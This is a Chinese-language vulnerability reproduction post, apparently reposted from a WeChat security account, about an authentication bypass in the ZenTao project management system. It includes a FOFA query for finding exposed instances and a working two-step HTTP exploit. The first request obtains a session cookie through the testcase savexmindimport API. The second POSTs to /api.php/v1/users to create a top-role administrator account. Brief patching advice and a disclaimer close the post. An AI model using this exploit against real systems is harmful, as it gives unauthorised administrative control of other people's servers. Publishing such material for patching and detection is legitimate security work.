漏洞描述
资产确定
fofa:
app="易软天创-禅道系统"
漏洞复现
1.利用如下POC先访问接口获取有效cookie。
GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=hxsjoqkyiveutbzwlvjv&branch=rbpcotcxawqpqhvhqfpp HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="109", "Chromium";v="109", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
2.获取有效cookie后,构造添加用户请求包,回显状态码403则表示添加成功。
POST /api.php/v1/users HTTP/1.1
Cookie: zentaosid=06cc7df8420574cf12a403d16cf3f5d9;
Host: {{Hostname}}
{"account": "Demo", "password": "DemoTest123", "realname": "Test", "role": "top", "group": "1"}
修复建议
1.升级至安全版本
2.在Web应用防火墙中添加接口临时黑名单规则
如有侵权,请联系删除
原文始发于微信公众号(我爱林):漏洞复现 || 禅道项目管理系统 身份认证绕过
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论